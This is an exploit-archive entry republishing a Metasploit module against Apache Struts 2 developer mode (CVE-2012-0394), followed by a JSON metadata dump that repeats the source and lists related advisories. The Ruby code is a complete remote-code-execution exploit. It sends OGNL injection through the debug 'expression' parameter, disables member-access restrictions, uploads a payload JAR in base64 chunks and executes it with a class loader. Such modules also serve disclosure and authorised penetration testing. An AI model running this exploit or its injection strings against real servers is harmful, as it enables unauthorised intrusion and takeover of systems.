ID 1337DAY-ID-21855 Type zdt Reporter metasploit Modified 2014-02-04T00:00:00
Description
This Metasploit module exploits a remote command execution vulnerability in Apache Struts 2. The problem exists on applications running in developer mode, where the DebuggingInterceptor allows evaluation and execution of OGNL expressions, which allows remote attackers to execute arbitrary Java code. This Metasploit module has been tested successfully in Struts 2.3.16, Tomcat 7 and Ubuntu 10.04.
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache Struts Developer Mode OGNL Execution',
'Description' => %q{
This module exploits a remote command execution vulnerability in Apache
Struts 2. The problem exists on applications running in developer mode,
where the DebuggingInterceptor allows evaluation and execution of OGNL
expressions, which allows remote attackers to execute arbitrary Java
code. This module has been tested successfully in Struts 2.3.16, Tomcat
7 and Ubuntu 10.04.
},
'Author' =>
[
'Johannes Dahse', # Vulnerability discovery and PoC
'Andreas Nusser', # Vulnerability discovery and PoC
'Alvaro', # @pwntester, 2014's PoC, avoided surname because of the spanish char, sorry about that :\
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2012-0394'],
[ 'OSVDB', '78276'],
[ 'EDB', '18329'],
[ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt' ],
[ 'URL', 'http://www.pwntester.com/blog/2014/01/21/struts-2-devmode/' ]
],
'Platform' => 'java',
'Arch' => ARCH_JAVA,
'Targets' =>
[
[ 'Struts 2', { } ]
],
'DisclosureDate' => 'Jan 06 2012',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(8080),
OptString.new('TARGETURI', [ true, 'The path to a struts application action', "/struts2-blank/example/HelloWorld.action"])
], self.class)
end
def check
vprint_status("Testing to see if the target can evaluate our Java code...")
addend_one = rand_text_numeric(rand(3) + 1).to_i
addend_two = rand_text_numeric(rand(3) + 1).to_i
sum = addend_one + addend_two
res = execute_command("new java.lang.Integer(#{addend_one}+#{addend_two})")
if res and res.code == 200 and res.body.to_i == sum
return Exploit::CheckCode::Vulnerable
end
if res and res.code == 200 and res.body.to_s =~ /#{sum}/
vprint_status("Code got evaluated. Target seems vulnerable, but the response contains something else:")
vprint_line(res.body.to_s)
return Exploit::CheckCode::Appears
end
return CheckCode::Safe
end
def exploit
@payload_jar = rand_text_alphanumeric(4+rand(4)) + ".jar"
upload_jar
execute_jar
end
def upload_jar
append = 'false'
jar = payload.encoded_jar.pack
chunk_length = 384 # 512 bytes when base64 encoded
while(jar.length > chunk_length)
java_upload_part(jar[0, chunk_length], @payload_jar, append)
jar = jar[chunk_length, jar.length - chunk_length]
append='true'
end
java_upload_part(jar, @payload_jar, append)
end
def java_upload_part(part, filename, append = 'false')
cmd = "#f=new java.io.FileOutputStream('#{filename}',#{append}),"
cmd << "#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}')),"
cmd << "#f.close()"
execute_command(cmd)
end
def execute_jar
cmd = ""
# disable Vararg handling (since it is buggy in OGNL used by Struts 2.1
cmd << "#[email protected]@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),"
cmd << "#q.setAccessible(true),#q.set(null,true),"
cmd << "#[email protected]@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),"
cmd << "#q.setAccessible(true),#q.set(null,false),"
# create classloader
cmd << "#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_jar}').toURI().toURL()}),"
# load class
cmd << "#c=#cl.loadClass('metasploit.Payload'),"
# invoke main method
cmd << "#c.getMethod('main',new java.lang.Class[]{@[email protected]('[Ljava.lang.String;')}).invoke("
cmd << "null,new java.lang.Object[]{new java.lang.String[0]})"
execute_command(cmd)
end
def execute_command(cmd)
injection = "#f=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#f.setAccessible(true),#f.set(#_memberAccess,true),CMD"
injection.gsub!(/CMD/, cmd)
vprint_status("Attempting to execute: #{cmd}")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path.to_s),
'method' => 'GET',
'vars_get' =>
{
'debug' => 'command',
'expression' => injection
}
})
return res
end
end
# 0day.today [2018-01-09] #
{"hash": "7f51325dda93d2c60d83ca2141405cb6d467958f34a0aa45044b107511a4ebd3", "id": "1337DAY-ID-21855", "lastseen": "2018-01-09T13:22:52", "viewCount": 1, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "5e29cce08564c278e508408e2d03b895", "key": "cvelist"}, {"hash": "737e2591b537c46d1ca7ce6f0cea5cb9", "key": "cvss"}, {"hash": "c97d9cbf5e5b6be7d04d5a4ea6630884", "key": "description"}, {"hash": "a8eb15bc47e0b8adcf1b0a3d5dd56376", "key": "href"}, {"hash": "8d2e0bb1b025f7f597465b56c586a7af", "key": "modified"}, {"hash": "8d2e0bb1b025f7f597465b56c586a7af", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "6719951e37a5b7c4b959f8df50c9d641", "key": "reporter"}, {"hash": "63192fee52055dd979e7c68148f3db0c", "key": "sourceData"}, {"hash": "74255ca6724c9333f457ecd312343cec", "key": "sourceHref"}, {"hash": "dd09ce170d24a6139931dce9d28039f1", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "edition": 2, "enchantments": {"vulnersScore": 7.5}, "type": "zdt", "sourceHref": "https://0day.today/exploit/21855", "description": "This Metasploit module exploits a remote command execution vulnerability in Apache Struts 2. The problem exists on applications running in developer mode, where the DebuggingInterceptor allows evaluation and execution of OGNL expressions, which allows remote attackers to execute arbitrary Java code. This Metasploit module has been tested successfully in Struts 2.3.16, Tomcat 7 and Ubuntu 10.04.", "title": "Apache Struts Developer Mode OGNL Execution Exploit", "history": [{"bulletin": {"hash": "fd98363f84646d0d13fb832169c7652c94576327acbd6154a4fb58a05faf3f39", "id": "1337DAY-ID-21855", "lastseen": "2016-04-20T01:42:39", "enchantments": {"score": {"value": 6.0, "modified": "2016-04-20T01:42:39"}}, "hashmap": [{"hash": "dd09ce170d24a6139931dce9d28039f1", "key": "title"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "6719951e37a5b7c4b959f8df50c9d641", "key": "reporter"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "c97d9cbf5e5b6be7d04d5a4ea6630884", "key": "description"}, {"hash": "86ff79ca8ef4b436d999400916d1e11f", "key": "sourceHref"}, {"hash": "8d2e0bb1b025f7f597465b56c586a7af", "key": "published"}, {"hash": "6784007488e0b3b7040babc4aba93a46", "key": "href"}, {"hash": "8d2e0bb1b025f7f597465b56c586a7af", "key": "modified"}, {"hash": "5e29cce08564c278e508408e2d03b895", "key": "cvelist"}, {"hash": "737e2591b537c46d1ca7ce6f0cea5cb9", "key": "cvss"}, {"hash": "9f2e18eb469720da9760b79948796584", "key": "sourceData"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/21855", "description": "This Metasploit module exploits a remote command execution vulnerability in Apache Struts 2. The problem exists on applications running in developer mode, where the DebuggingInterceptor allows evaluation and execution of OGNL expressions, which allows remote attackers to execute arbitrary Java code. This Metasploit module has been tested successfully in Struts 2.3.16, Tomcat 7 and Ubuntu 10.04.", "viewCount": 1, "title": "Apache Struts Developer Mode OGNL Execution Exploit", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "objectVersion": "1.0", "cvelist": ["CVE-2012-0394"], "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Apache Struts Developer Mode OGNL Execution',\r\n 'Description' => %q{\r\n This module exploits a remote command execution vulnerability in Apache\r\n Struts 2. The problem exists on applications running in developer mode,\r\n where the DebuggingInterceptor allows evaluation and execution of OGNL\r\n expressions, which allows remote attackers to execute arbitrary Java\r\n code. This module has been tested successfully in Struts 2.3.16, Tomcat\r\n 7 and Ubuntu 10.04.\r\n },\r\n 'Author' =>\r\n [\r\n 'Johannes Dahse', # Vulnerability discovery and PoC\r\n 'Andreas Nusser', # Vulnerability discovery and PoC\r\n 'Alvaro', # @pwntester, 2014's PoC, avoided surname because of the spanish char, sorry about that :\\\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2012-0394'],\r\n [ 'OSVDB', '78276'],\r\n [ 'EDB', '18329'],\r\n [ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt' ],\r\n [ 'URL', 'http://www.pwntester.com/blog/2014/01/21/struts-2-devmode/' ]\r\n ],\r\n 'Platform' => 'java',\r\n 'Arch' => ARCH_JAVA,\r\n 'Targets' =>\r\n [\r\n [ 'Struts 2', { } ]\r\n ],\r\n 'DisclosureDate' => 'Jan 06 2012',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(8080),\r\n OptString.new('TARGETURI', [ true, 'The path to a struts application action', \"/struts2-blank/example/HelloWorld.action\"])\r\n ], self.class)\r\n end\r\n\r\n def check\r\n vprint_status(\"Testing to see if the target can evaluate our Java code...\")\r\n addend_one = rand_text_numeric(rand(3) + 1).to_i\r\n addend_two = rand_text_numeric(rand(3) + 1).to_i\r\n sum = addend_one + addend_two\r\n\r\n res = execute_command(\"new java.lang.Integer(#{addend_one}+#{addend_two})\")\r\n\r\n if res and res.code == 200 and res.body.to_i == sum\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n if res and res.code == 200 and res.body.to_s =~ /#{sum}/\r\n vprint_status(\"Code got evaluated. Target seems vulnerable, but the response contains something else:\")\r\n vprint_line(res.body.to_s)\r\n return Exploit::CheckCode::Appears\r\n end\r\n\r\n return CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n @payload_jar = rand_text_alphanumeric(4+rand(4)) + \".jar\"\r\n\r\n upload_jar\r\n execute_jar\r\n end\r\n\r\n def upload_jar\r\n append = 'false'\r\n jar = payload.encoded_jar.pack\r\n chunk_length = 384 # 512 bytes when base64 encoded\r\n\r\n while(jar.length > chunk_length)\r\n java_upload_part(jar[0, chunk_length], @payload_jar, append)\r\n jar = jar[chunk_length, jar.length - chunk_length]\r\n append='true'\r\n end\r\n java_upload_part(jar, @payload_jar, append)\r\n end\r\n\r\n def java_upload_part(part, filename, append = 'false')\r\n cmd = \"#f=new java.io.FileOutputStream('#{filename}',#{append}),\"\r\n cmd << \"#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}')),\"\r\n cmd << \"#f.close()\"\r\n execute_command(cmd)\r\n end\r\n\r\n def execute_jar\r\n cmd = \"\"\r\n # disable Vararg handling (since it is buggy in OGNL used by Struts 2.1\r\n cmd << \"#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),\"\r\n cmd << \"#q.setAccessible(true),#q.set(null,true),\"\r\n cmd << \"#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),\"\r\n cmd << \"#q.setAccessible(true),#q.set(null,false),\"\r\n # create classloader\r\n cmd << \"#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_jar}').toURI().toURL()}),\"\r\n # load class\r\n cmd << \"#c=#cl.loadClass('metasploit.Payload'),\"\r\n # invoke main method\r\n cmd << \"#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke(\"\r\n cmd << \"null,new java.lang.Object[]{new java.lang.String[0]})\"\r\n execute_command(cmd)\r\n end\r\n\r\n def execute_command(cmd)\r\n injection = \"#f=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#f.setAccessible(true),#f.set(#_memberAccess,true),CMD\"\r\n injection.gsub!(/CMD/, cmd)\r\n\r\n vprint_status(\"Attempting to execute: #{cmd}\")\r\n\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path.to_s),\r\n 'method' => 'GET',\r\n 'vars_get' =>\r\n {\r\n 'debug' => 'command',\r\n 'expression' => injection\r\n }\r\n })\r\n\r\n return res\r\n end\r\n\r\n\r\nend\n\n# 0day.today [2016-04-20] #", "published": "2014-02-04T00:00:00", "references": [], "reporter": "metasploit", "modified": "2014-02-04T00:00:00", "href": "http://0day.today/exploit/description/21855"}, "lastseen": "2016-04-20T01:42:39", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": ["CVE-2012-0394"], "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Apache Struts Developer Mode OGNL Execution',\r\n 'Description' => %q{\r\n This module exploits a remote command execution vulnerability in Apache\r\n Struts 2. The problem exists on applications running in developer mode,\r\n where the DebuggingInterceptor allows evaluation and execution of OGNL\r\n expressions, which allows remote attackers to execute arbitrary Java\r\n code. This module has been tested successfully in Struts 2.3.16, Tomcat\r\n 7 and Ubuntu 10.04.\r\n },\r\n 'Author' =>\r\n [\r\n 'Johannes Dahse', # Vulnerability discovery and PoC\r\n 'Andreas Nusser', # Vulnerability discovery and PoC\r\n 'Alvaro', # @pwntester, 2014's PoC, avoided surname because of the spanish char, sorry about that :\\\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2012-0394'],\r\n [ 'OSVDB', '78276'],\r\n [ 'EDB', '18329'],\r\n [ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt' ],\r\n [ 'URL', 'http://www.pwntester.com/blog/2014/01/21/struts-2-devmode/' ]\r\n ],\r\n 'Platform' => 'java',\r\n 'Arch' => ARCH_JAVA,\r\n 'Targets' =>\r\n [\r\n [ 'Struts 2', { } ]\r\n ],\r\n 'DisclosureDate' => 'Jan 06 2012',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(8080),\r\n OptString.new('TARGETURI', [ true, 'The path to a struts application action', \"/struts2-blank/example/HelloWorld.action\"])\r\n ], self.class)\r\n end\r\n\r\n def check\r\n vprint_status(\"Testing to see if the target can evaluate our Java code...\")\r\n addend_one = rand_text_numeric(rand(3) + 1).to_i\r\n addend_two = rand_text_numeric(rand(3) + 1).to_i\r\n sum = addend_one + addend_two\r\n\r\n res = execute_command(\"new java.lang.Integer(#{addend_one}+#{addend_two})\")\r\n\r\n if res and res.code == 200 and res.body.to_i == sum\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n if res and res.code == 200 and res.body.to_s =~ /#{sum}/\r\n vprint_status(\"Code got evaluated. Target seems vulnerable, but the response contains something else:\")\r\n vprint_line(res.body.to_s)\r\n return Exploit::CheckCode::Appears\r\n end\r\n\r\n return CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n @payload_jar = rand_text_alphanumeric(4+rand(4)) + \".jar\"\r\n\r\n upload_jar\r\n execute_jar\r\n end\r\n\r\n def upload_jar\r\n append = 'false'\r\n jar = payload.encoded_jar.pack\r\n chunk_length = 384 # 512 bytes when base64 encoded\r\n\r\n while(jar.length > chunk_length)\r\n java_upload_part(jar[0, chunk_length], @payload_jar, append)\r\n jar = jar[chunk_length, jar.length - chunk_length]\r\n append='true'\r\n end\r\n java_upload_part(jar, @payload_jar, append)\r\n end\r\n\r\n def java_upload_part(part, filename, append = 'false')\r\n cmd = \"#f=new java.io.FileOutputStream('#{filename}',#{append}),\"\r\n cmd << \"#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}')),\"\r\n cmd << \"#f.close()\"\r\n execute_command(cmd)\r\n end\r\n\r\n def execute_jar\r\n cmd = \"\"\r\n # disable Vararg handling (since it is buggy in OGNL used by Struts 2.1\r\n cmd << \"#[email\u00a0protected]@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),\"\r\n cmd << \"#q.setAccessible(true),#q.set(null,true),\"\r\n cmd << \"#[email\u00a0protected]@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),\"\r\n cmd << \"#q.setAccessible(true),#q.set(null,false),\"\r\n # create classloader\r\n cmd << \"#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_jar}').toURI().toURL()}),\"\r\n # load class\r\n cmd << \"#c=#cl.loadClass('metasploit.Payload'),\"\r\n # invoke main method\r\n cmd << \"#c.getMethod('main',new java.lang.Class[]{@[email\u00a0protected]('[Ljava.lang.String;')}).invoke(\"\r\n cmd << \"null,new java.lang.Object[]{new java.lang.String[0]})\"\r\n execute_command(cmd)\r\n end\r\n\r\n def execute_command(cmd)\r\n injection = \"#f=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#f.setAccessible(true),#f.set(#_memberAccess,true),CMD\"\r\n injection.gsub!(/CMD/, cmd)\r\n\r\n vprint_status(\"Attempting to execute: #{cmd}\")\r\n\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path.to_s),\r\n 'method' => 'GET',\r\n 'vars_get' =>\r\n {\r\n 'debug' => 'command',\r\n 'expression' => injection\r\n }\r\n })\r\n\r\n return res\r\n end\r\n\r\n\r\nend\n\n# 0day.today [2018-01-09] #", "published": "2014-02-04T00:00:00", "references": [], "reporter": "metasploit", "modified": "2014-02-04T00:00:00", "href": "https://0day.today/exploit/description/21855"}
{"result": {"cve": [{"id": "CVE-2012-0394", "type": "cve", "title": "CVE-2012-0394", "description": "** DISPUTED ** The DebuggingInterceptor component in Apache Struts before 2.3.1.1, when developer mode is used, allows remote attackers to execute arbitrary commands via unspecified vectors. NOTE: the vendor characterizes this behavior as not \"a security vulnerability itself.\"", "published": "2012-01-08T10:55:01", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0394", "cvelist": ["CVE-2012-0394"], "lastseen": "2016-09-03T16:10:11"}], "exploitdb": [{"id": "EDB-ID:31434", "type": "exploitdb", "title": "Apache Struts Developer Mode OGNL Execution", "description": "Apache Struts Developer Mode OGNL Execution. CVE-2012-0394. Remote exploit for java platform", "published": "2014-02-05T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/31434/", "cvelist": ["CVE-2012-0394"], "lastseen": "2016-02-03T14:38:10"}, {"id": "EDB-ID:18329", "type": "exploitdb", "title": "Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities", "description": "Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities. CVE-2012-0391,CVE-2012-0392,CVE-2012-0393,CVE-2012-0394. Webapps exploits for multiple platform", "published": "2012-01-06T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/18329/", "cvelist": ["CVE-2012-0391", "CVE-2012-0393", "CVE-2012-0392", "CVE-2012-0394"], "lastseen": "2016-02-02T09:32:08"}], "packetstorm": [{"id": "PACKETSTORM:125020", "type": "packetstorm", "title": "Apache Struts Developer Mode OGNL Execution", "description": "", "published": "2014-02-01T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://packetstormsecurity.com/files/125020/Apache-Struts-Developer-Mode-OGNL-Execution.html", "cvelist": ["CVE-2012-0394"], "lastseen": "2016-12-05T22:25:36"}], "dsquare": [{"id": "E-77", "type": "dsquare", "title": "Apache-Struts DebuggingInterceptor < 2.3.1.1 RCE Linux", "description": "Apache-Struts2 / OpenSymphony-Xwork RCE\n\nVulnerability Type: Remote Command Execution", "published": "2012-03-24T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "cvelist": ["CVE-2012-0394"], "lastseen": "2017-09-26T15:33:26"}, {"id": "E-342", "type": "dsquare", "title": "Apache-Struts ExceptionDelegator < 2.3.1.1 RCE Linux", "description": "Apache-Struts2 RCE\n\nVulnerability Type: Remote Command Execution", "published": "2012-03-24T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "cvelist": ["CVE-2012-0394"], "lastseen": "2017-09-26T15:33:26"}, {"id": "E-70", "type": "dsquare", "title": "Apache-Struts DebuggingInterceptor < 2.3.1.1 RCE Windows", "description": "Apache-Struts2 / OpenSymphony-Xwork RCE\n\nVulnerability Type: Remote Command Execution", "published": "2012-03-24T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "cvelist": ["CVE-2012-0394"], "lastseen": "2017-09-26T15:33:26"}], "metasploit": [{"id": "MSF:EXPLOIT/MULTI/HTTP/STRUTS_DEV_MODE", "type": "metasploit", "title": "Apache Struts 2 Developer Mode OGNL Execution", "description": "This module exploits a remote command execution vulnerability in Apache Struts 2. The problem exists on applications running in developer mode, where the DebuggingInterceptor allows evaluation and execution of OGNL expressions, which allows remote attackers to execute arbitrary Java code. This module has been tested successfully on Struts 2.3.16, Tomcat 7 and Ubuntu 10.04.", "published": "2014-01-26T00:17:01", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "cvelist": ["CVE-2012-0394"], "lastseen": "2018-05-18T17:16:10"}], "canvas": [{"id": "STRUTSCODEINJECTION", "type": "canvas", "title": "Immunity Canvas: STRUTSCODEINJECTION", "description": "**Name**| strutsCodeInjection \n---|--- \n**CVE**| CVE-2012-0394 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| Struts Code Injector \n**Notes**| CVE Name: CVE-2012-0394 \nVENDOR: Apache \nNotes: \nCVE-2012-0394 \n\\- Struts <= 2.2.1.1 (ExceptionDelegator) \n \nWhen an exception occurs while applying parameter values to properties, the \nvalue is evaluated as OGNL expression which can be abused to accomplish Java code execution. \n \n\\- Struts <= 2.3.1 (CookieInterceptor) \n \nAgain an OGNL expression can be abused to accomplish arbitrary Java code execution \nby means of a crafted cookie. \n \nCVE-2010-1870 \n\\- Struts <= 2.2.0 (Xworks filter bypass) \nUnicode characters can be used to bypass character restrictions on OGNL expressions. \n \n \nRepeatability: Infinite \nReferences: \nCVE-2012-0394 \nhttp://struts.apache.org/2.x/docs/s2-008.html \nhttps://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt \n \nCVE-2010-1870 \nhttp://seclists.org/fulldisclosure/2010/Jul/183 \nhttp://struts.apache.org/2.2.1/docs/s2-005.html \n \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2012-0394 \nCompatibility: \nStruts <= 2.2.1.1 (ExceptionDelegator) \nStruts <= 2.3.1 (CookieInterceptor) \nStruts <= 2.2.0 (XworksFilterBypass) \n \n\n", "published": "2012-01-08T10:55:01", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/strutsCodeInjection", "cvelist": ["CVE-2010-1870", "CVE-2012-0394"], "lastseen": "2016-09-25T14:12:35"}]}}
